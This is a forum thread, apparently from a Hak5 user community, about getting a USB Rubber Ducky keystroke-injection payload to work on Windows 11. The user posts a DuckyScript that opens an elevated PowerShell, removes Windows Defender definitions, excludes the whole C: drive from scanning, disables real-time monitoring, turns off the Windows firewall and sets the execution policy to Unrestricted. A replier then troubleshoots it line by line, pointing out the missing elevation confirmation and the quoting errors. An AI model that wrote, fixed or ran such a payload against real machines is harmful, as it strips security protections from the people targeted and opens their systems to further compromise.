Payload doesn't inject

[Rusty_83]

Hi,

I've just received the rubber ducky and as far as I can tell, the ducky doesn't do a single thing.

I've used the payload generator to create the inject.bin file, replaced the inject.bin file on the root of the ducky and tried a number of scripts, but simply nothing happens when I insert the USB. When I press the button, the ducky returns to STORAGE mode and I can see the USB device 'DUCKY'. The LED is constantly green.

I'm using Windows 11.

What am I doing wrong?

Thanks for any help

[Irukandji]

Have you tried?

https://payloadstudio.hak5.org/

[dark_pyrro]

4 hours ago, Rusty_83 said:

tried a number of scripts

What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working.

[Rusty_83]

14 hours ago, dark_pyrro said:

What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working.

Ok I'm not sure what exactly I've done differently, but all seems to be working now on the ducky.

However I haven't been able to disable Windows Defender. The script I used is as follows:

-------------------------------------------

DELAY 3000

GUI x
DELAY 500
STRINGLN a
DELAY 1000

ATTACKMODE HID
DELAY 500

REM STAGE 2  Stop Windows Defender Anti Virus********
REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy REM Unrestricted}"
DELAY 1000
STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";
DELAY 1000
STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\";
DELAY 500
STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
DELAY 1000
STRINGLN netsh advfirewall set allprofiles state off  
DELAY 1000
STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
DELAY 1000
SHIFT y
DELAY 500
ENTER;

-----------------------------------------------------

However Windows Defender is still running. Any ideas?

[dark_pyrro]

8 hours ago, Rusty_83 said:

DELAY 3000

Not really important in terms of getting the payload in general to work, but instead of using the initial delay, you could use the PASSIVE_WINDOWS_DETECT extension since the target is Windows based.

8 hours ago, Rusty_83 said:

GUI x
DELAY 500
STRINGLN a
DELAY 1000

Something's missing in this code block. Usually, you need to confirm the elevated terminal/console, but I can't see that here (i.e. "Yes" has to be pressed to get to the elevated prompt). A longer delay is perhaps also needed, but it depends on the performance of the target and how fast it can open the PowerShell window.

9 hours ago, Rusty_83 said:

ATTACKMODE HID
DELAY 500

This shouldn't be necessary since the default ATTACKMODE for the Ducky is ATTACKMODE HID. And, if it wasn't, it still had to be moved to the top of the payload since keystrokes are entered before ATTACKMODE HID is introduced in the payload code.

9 hours ago, Rusty_83 said:

STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";

Try running this line manually exactly the way it looks. What is the result? It will cd into the directory, but then just echo the rest of the commands. Remove the quote marks around the commands and try it again. Any difference?

A general tip is that if something isn't working, try running it manually and see what the results are. It will help a lot when troubleshooting.